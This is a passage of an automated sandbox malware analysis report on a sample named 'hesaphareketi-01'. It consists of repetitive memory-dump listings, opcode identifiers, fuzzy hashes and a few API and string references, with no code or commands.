                                                  • Instruction Fuzzy Hash: AB71A2A2B1CA3666FFAC6F0EE4C0974A6A0AF13758FD0003CD40AD7A55DE3DB4506A61
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                   • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: BreakCounterCreateDebugEventPerformanceQuery
                                                  • String ID:
                                                  • API String ID: 4239280443-0
                                                  • Opcode ID: c34d052a868cd4b60924c0b1e92cbc460f46e007d6bb4a206f187a08c30cf7c3
                                                  • Instruction ID: 4ca2f6ea7f4cc0e5c5d0290277e352dcb261c783032708703f58bfa4e0c19e77
                                                  • Opcode Fuzzy Hash: c34d052a868cd4b60924c0b1e92cbc460f46e007d6bb4a206f187a08c30cf7c3
                                                  • Instruction Fuzzy Hash: 43420F32D09B42A5EB58AF26B8C0264B3A4FF56744F90523DD99CA3771DF3CA591E320
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                   • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID: 0-3916222277
                                                  • Opcode ID: 170f8f4704fea771372d3c5e4c17b39ad4eafef7f37a81aab25316a8070dc8bd
                                                  • Instruction ID: 279d1f3980dc5910a3a270a4a62a38dfd96168bd73024b9cffe114f03f2fe745
                                                  • Opcode Fuzzy Hash: 170f8f4704fea771372d3c5e4c17b39ad4eafef7f37a81aab25316a8070dc8bd
                                                  • Instruction Fuzzy Hash: F852D932A08B86A6DA189F07E8D4278B3E5FF45794F940135DA5DA3790DF3EE450E321
                                                  Strings
                                                  • ========== ENDGC %d (gen = %lu, collect_classes = %lu) ===========}, xrefs: 00007FF7341F86FB
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                   • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ========== ENDGC %d (gen = %lu, collect_classes = %lu) ===========}
                                                  • API String ID: 0-2256439813
                                                  • Opcode ID: 061b6938f4016a34bcb0bd81591986c075d9c77a106380fc5b89187094526531
                                                  • Instruction ID: 93f7bdd9dc6c5b5647af9ed16ecce6111d46f1f0b731565789656e1055a7f8d0
                                                  • Opcode Fuzzy Hash: 061b6938f4016a34bcb0bd81591986c075d9c77a106380fc5b89187094526531
                                                  • Instruction Fuzzy Hash: 0042B832A0AB46A6EE59AF1AE4C0379B3A1FF05744F944139CA4D93361DF3DE462D720
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                   • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ?
                                                  • API String ID: 0-1684325040
                                                  • Opcode ID: 39d35dd192e213be530d99728a9c3530756a8bd52014cd6a83916c8dc71fdbc9
                                                  • Instruction ID: 470b5ba9b5d7e907aefb952bc7eb88a5ae5cd8388a2bbd1226f66f8ef37e0aa9
                                                  • Opcode Fuzzy Hash: 39d35dd192e213be530d99728a9c3530756a8bd52014cd6a83916c8dc71fdbc9
                                                  • Instruction Fuzzy Hash: D912003AA08F4292EA28EF03F484679B3A1FB45B94F944235DA5D93794DF3CE481D714
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                  • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Time$FileSystem
                                                  • String ID:
                                                  • API String ID: 2086374402-0
                                                  • Opcode ID: 5c980d6ba46e3a73f0dcc2ee7f1a165251c54b4aeab7c0793880b0067312ad67
                                                  • Instruction ID: c12cc9161d148d02d6932aa758d479055721f641a064f269e33710a0e5e90e08
                                                  • Opcode Fuzzy Hash: 5c980d6ba46e3a73f0dcc2ee7f1a165251c54b4aeab7c0793880b0067312ad67
                                                  • Instruction Fuzzy Hash: 53212832A08B42A7EF48EF66F880269B2E0EB4A340F84413DE54D93351DF3DA5409760
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                  • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CounterPerformanceQuery
                                                  • String ID:
                                                  • API String ID: 2783962273-3916222277
                                                  • Opcode ID: d52441a9fe127e5d59a6260759f4b20b6237ae2c80609afff28cd25b6676035c
                                                  • Instruction ID: 9bdcad5af30c3a80de1198ba5b65a5d139dc22394d842d683440eb885e208f1b
                                                  • Opcode Fuzzy Hash: d52441a9fe127e5d59a6260759f4b20b6237ae2c80609afff28cd25b6676035c
                                                  • Instruction Fuzzy Hash: E3D1E662A1DE4691EA18AF26F480279A3D0FF51BA4F844335DB6D937D4CF3CE442A310
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                  • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: X@2
                                                  • API String ID: 0-2772482207
                                                  • Opcode ID: 2c5450eb009bbb477380e5294b5de819db12dd9e00ce9680b9f4d20b2e4ec7d5
                                                  • Instruction ID: 6f95bef056c37f4f7d3565f3f8251fc8f584a9b0e19d93000d5da504234f6c61
                                                  • Opcode Fuzzy Hash: 2c5450eb009bbb477380e5294b5de819db12dd9e00ce9680b9f4d20b2e4ec7d5
                                                  • Instruction Fuzzy Hash: B0917036E1DB42A6EA28AF16F8C0369B3A0FB46744FD04139D94D93360DF3CE491A714
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                  • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d9884e8459a2da4eee788d28edbed6ad75013be01f180accf8dedfb5a0459d2e
                                                  • Instruction ID: 17e3cd80659a790a2cc54ec84a5a67f3d739b7ffbcb10434a6b060861d88e293
                                                  • Opcode Fuzzy Hash: d9884e8459a2da4eee788d28edbed6ad75013be01f180accf8dedfb5a0459d2e
                                                  • Instruction Fuzzy Hash: D392A162A18B4665EE49BF57A9C4674E3D5BF46BC0F84413AD80EF3360DE3DE841A321
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                  • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 549e6052dfb5f75015054c6104143178bc8924d384410c045d17cae26b1dd661
                                                  • Instruction ID: 6d5b7efbaa4c35c8d77bd0164499130bcf281029e2dd30101034bc44e89153bc
                                                  • Opcode Fuzzy Hash: 549e6052dfb5f75015054c6104143178bc8924d384410c045d17cae26b1dd661
                                                  • Instruction Fuzzy Hash: FF42DF32B08B4696EB18AF26E4845ACB7F1FB44B88F440536EE4DA7B58CE3DE441D711
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                  • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7bc02a47b9c6b537f87ba7f03e9d8996afc695ebb4e05c8f65f414fc91164dd3
                                                  • Instruction ID: aa3b3af9c88b347535baa0422fa8fd936f34a1faf91495ee55cd6ecb01088809
                                                  • Opcode Fuzzy Hash: 7bc02a47b9c6b537f87ba7f03e9d8996afc695ebb4e05c8f65f414fc91164dd3
                                                  • Instruction Fuzzy Hash: 4B32F432F09B45A6EB18DF66D4842ACA7F2AB04788F804136CE0DB7798DE39E455D361
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                  • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 567bd8c800cafad585b7cf90b26b86391f749c9adea7eec1786a4c820cec952b
                                                  • Instruction ID: f0affa4e1a327dbc150a6ad7330c03870f245c902c8f611913c667e3edc106dd
                                                  • Opcode Fuzzy Hash: 567bd8c800cafad585b7cf90b26b86391f749c9adea7eec1786a4c820cec952b
                                                  • Instruction Fuzzy Hash: 7D02B272B05E42A6EB589F5AE480678B790AB41BA4FC44335DB2E977D5CF3CE441E320
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                  • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ae9fc67e00198cb791d6b42d7e224a19ac5270105391cad9a71a2955a2d292d9
                                                  • Instruction ID: 3f355bca40b6cc608148b3b5d70ba25b5017a41fbc1ab9d531b466e3f32117a3
                                                  • Opcode Fuzzy Hash: ae9fc67e00198cb791d6b42d7e224a19ac5270105391cad9a71a2955a2d292d9
                                                  • Instruction Fuzzy Hash: A5F10822F26B4D51E91A9A3761813B8D7915F6A7C0E5CCB36E94D76770EF3CB083A210
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                  • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a30e9ccede4defc8cb9bb7021f2aed867e6faa058a659ec2196f15f4e69dc293
                                                  • Instruction ID: a8be3322c8e28839b23d93c306ef927016899d1ab7723c3b92b799b04dcca90e
                                                  • Opcode Fuzzy Hash: a30e9ccede4defc8cb9bb7021f2aed867e6faa058a659ec2196f15f4e69dc293
                                                  • Instruction Fuzzy Hash: 18F1F272B09F8592EB189F26A484278A3A0FB55BA4F945331CF6D57791DF3CE082E310
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                  • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CounterPerformanceQuery
                                                  • String ID:
                                                  • API String ID: 2783962273-0
                                                  • Opcode ID: c1850e810df6202e2c71cd3c6d27a795553a239f11018daae015bd6db6a2eabd
                                                  • Instruction ID: 4b4ff88a9ed8d4b61f07d42f69d4740d8403e8455c58fa38593a7ae350d54019
                                                  • Opcode Fuzzy Hash: c1850e810df6202e2c71cd3c6d27a795553a239f11018daae015bd6db6a2eabd
                                                  • Instruction Fuzzy Hash: F402E726A19F4671EE59EF26A4D0334A7A0BF49784FA44239DD4DA33A0DF3DE481D224
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                  • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a067f801db91a70f563a5d40447dd11d047fed665657b512b0d6a88a55159cf1
                                                  • Instruction ID: cd6009f9a3c2cd7f1c96d56a0886c9c5a5c53e4533abd88a52e28faec612bc26
                                                  • Opcode Fuzzy Hash: a067f801db91a70f563a5d40447dd11d047fed665657b512b0d6a88a55159cf1
                                                  • Instruction Fuzzy Hash: 77E1C272A08B45A6EB59AF26D484379B7E1FB45B80F80423AC94DE3390DF3DE445E712
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                  • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2d93270e60e16491fbe54944405fcef5222b15305876aeadfc7a3f6476fd23a8
                                                  • Instruction ID: 0704fd0ff0ea45c639977fe5d9a765b551556945cf8edb0c334f8a52e5d24956
                                                  • Opcode Fuzzy Hash: 2d93270e60e16491fbe54944405fcef5222b15305876aeadfc7a3f6476fd23a8
                                                  • Instruction Fuzzy Hash: E1E10623A1BFC555E51BEF36A091375E398AF567C0F848332DE4F72662DF2961839210
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                  • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4edf0397d65345d120d8a261b0ef52faea315b51b514a397b6118f37b68e7496
                                                  • Instruction ID: d6f859fe881199a3224c01121fbf0049257bff26ac6717046641028a1ddee733
                                                  • Opcode Fuzzy Hash: 4edf0397d65345d120d8a261b0ef52faea315b51b514a397b6118f37b68e7496
                                                  • Instruction Fuzzy Hash: D5C19532A19A46A1EE58AF07F8D0278B7A0FF46B90F844235CA6D93794DF7CE451E314
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                  • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f81cb8a8fa680b7983bac6cb0d1cb7bd7e58e6fd297d06bcd676f255ee82a72e
                                                  • Instruction ID: 5e0da08d0122df8ef1c3b4bb6a378f5e230c3848befed510a759d828eae09902
                                                  • Opcode Fuzzy Hash: f81cb8a8fa680b7983bac6cb0d1cb7bd7e58e6fd297d06bcd676f255ee82a72e
                                                  • Instruction Fuzzy Hash: FEC17432A08B46A2DE58EF07E8D4178B7A5FB46790B840136D95DE77A4CF3DE850E321
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                  • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
